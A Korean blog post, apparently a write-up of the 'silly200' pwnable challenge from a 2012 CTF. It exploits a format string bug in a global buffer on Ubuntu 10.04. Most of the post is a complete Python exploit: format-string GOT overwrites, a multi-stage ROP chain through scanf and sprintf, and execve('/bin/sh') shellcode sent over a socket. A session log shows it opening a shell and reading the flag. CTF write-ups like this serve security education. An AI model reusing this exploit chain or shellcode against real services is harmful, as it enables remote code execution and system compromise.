Overview
Category : Pwnables
read /home/silly200/flag.txt :p
ADDR : challenge.b10s.org
PORT : 13302
binary : http://jff.b10s.org/files/silly200
* ASLR & NX are enabled on challenge server
* Server OS : Ubuntu 10.04Summary : Global variable based format string bug on Ubuntu 10.04
- 문제풀이 가능성 자체에 대해 의문을 품는 분들도 계셔서 , 문제풀이를 쓰기전에 Exploit부터 올려두겠습니다.
silly200 문제는 전역변수에 있는 문자열을 포맷스트링 없이 fprintf()로 출력하면서 fsb 취약점이 발생하는 문제입니다.
그런데 stack에는 공격자가 원하는대로 컨트롤 가능한 값이 4byte밖에 존재하지 않습니다.
이 문제를 풀이하기위해 약간 새로운 Format String Bug exploitation 기술이 사용되었으며, 문서화중에 있습니다.
그래서 silly200 문제에 관련된 문서는 이 exploit을 포함해 3개가 작성될 예정입니다
아래코드가 문제풀이에 사용되는 Exploit입니다.
#!/usr/bin/python
from struct import pack
from socket import *
import time
HOST = "challenge.b10s.org"
PORT = 13302
SHELLCODE = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x10\x48\x48\x48\x48\x48\xcd\x80"
# execve("/bin/sh" , {"sh",0} , 0); Shellcode without 0x0b
p = lambda x :pack("<L" , x)
printf_got = 0x804A018 # printf@got
scanf_plt = 0x8048568 # scanf@plt
puts_plt = 0x8048578 # puts@plt
sprintf_plt = 0x80484C8 # sprintf@plt
pppr = 0x80487F6 # pop ; pop ; pop ebp; ret
leave_ret = 0x8048783 # leave ; ret
rwx_ptr = 0x8049ff8 # &GOT + 4
base_addr = 0x804A080 # &(global variable "buffer")
base_addr2 = 0x804AF10 # space for stage2
format_string = 0x8048872 # &"%s"
taddr = []
taddr.append(pppr / 0x10000)
taddr.append(pppr % 0x10000)
######################## pin number ##############################
payload1 = ""
payload1 += str(leave_ret) # leave ; ret ;
##################################################################
######################### STAGE 0 ################################
rop1 = ""
rop1 += p(0xdeadbeef) # dummy
rop1 += p(pppr + 2) # pop ebp; ret
rop1 += p(base_addr + 900 + 4*4) # 900 = Size of payload2 , 4*4 = Size of rop1 ==> this point STAGE 1 paylaod
rop1 += p(leave_ret) # leave ; ret
payload2 = ""
payload2 += "%8x"*7
payload2 += "%%%dc" %(printf_got - 56 - 4*4) # 4*4 = Size of rop1
payload2 += "%n" # sfp
payload2 += "%2c"
payload2 += "%n" # filename
payload2 += "%8x"*5
payload2 += "%%%dc" %((0x10000 + taddr[0] - ((printf_got + 2 + 40)%0x10000))%0x10000)
payload2 += "%hn"
payload2 += "%8x"*9
payload2 += "%%%dc" %(((0x10000 + taddr[1]) - taddr[0] - 72)%0x10000)
payload2 += "%hn"
payload2 += "a"*(900-len(payload2))
stage_0 = rop1 + payload2
###################################################################
######################### STAGE 1 #################################
rop2 = ""
rop2 += p(0xdeadbeef) # dummy
rop2 += p(scanf_plt) # scanf@plt
rop2 += p(pppr + 1) # pop ; pop ; ret;
rop2 += p(format_string) # &"%s"
rop2 += p(base_addr2) # space for new payload
rop2 += p(leave_ret) # leave ; ret
stage_1 = rop2
####################################################################
######################### STAGE 2 ##################################
rop3 = ""
rop3 += p(0xdeadbeef) # dummy
rop3 += p(sprintf_plt) # sprintf@plt
rop3 += p(pppr) # pop ; pop ; pop ; ret
rop3 += p(base_addr2 + 4*9) # --------------------------------------------|
rop3 += p(format_string) # &"%s" |
rop3 += p(rwx_ptr) # &GOT + 4 |
# |
rop3 += p(scanf_plt) # scanf@plt |
rop3 += p(pppr + 2) # pop ; ret; |
rop3 += p(format_string) # &"%s" |
rop3 += p(0xdeadbeef) # this will be replaced to RWX memory address<-
stage_2 = rop3
#####################################################################
s = socket(AF_INET , SOCK_STREAM)
s.connect((HOST , PORT))
s.recv(1024)
s.send(payload1 + "\n") # for pin number
s.recv(1024)
s.send(stage_0 + stage_1 + "\n")
time.sleep(1)
s.send(stage_2 + "\n")
time.sleep(1)
s.send(SHELLCODE + "\n")
time.sleep(1)
########################## Got Shell ##############################
while 1:
cmd = raw_input("$ ")
s.send(cmd + "\n")
if cmd == "exit":
break
print s.recv(1024)
s.close()
####################################################################pwn3r@localhost silly200]$ ./exploit.py
$ id
uid=1006(silly200) gid=1006(silly200)
$ cat flag.txt
bobrhkwpduffkaksgdmaTTuid=1006(silly200) gid=1006(silly200)풀이에 사용된 기술
'CTF > 2012' 카테고리의 다른 글
| BOB 1기 모의사이버전 - memod (1) | 2012.12.03 |
|---|---|
| POWER OF XX 2012 예선 - listd (1) | 2012.11.09 |
| POWER OF XX 2012 본선 - leakme (0) | 2012.11.09 |
| Just For Fun Season2 2012 - silly100 (8) | 2012.08.05 |
| 제 1회 청소년 화이트해커 경진대회 문제풀이보고서 (0) | 2012.05.24 |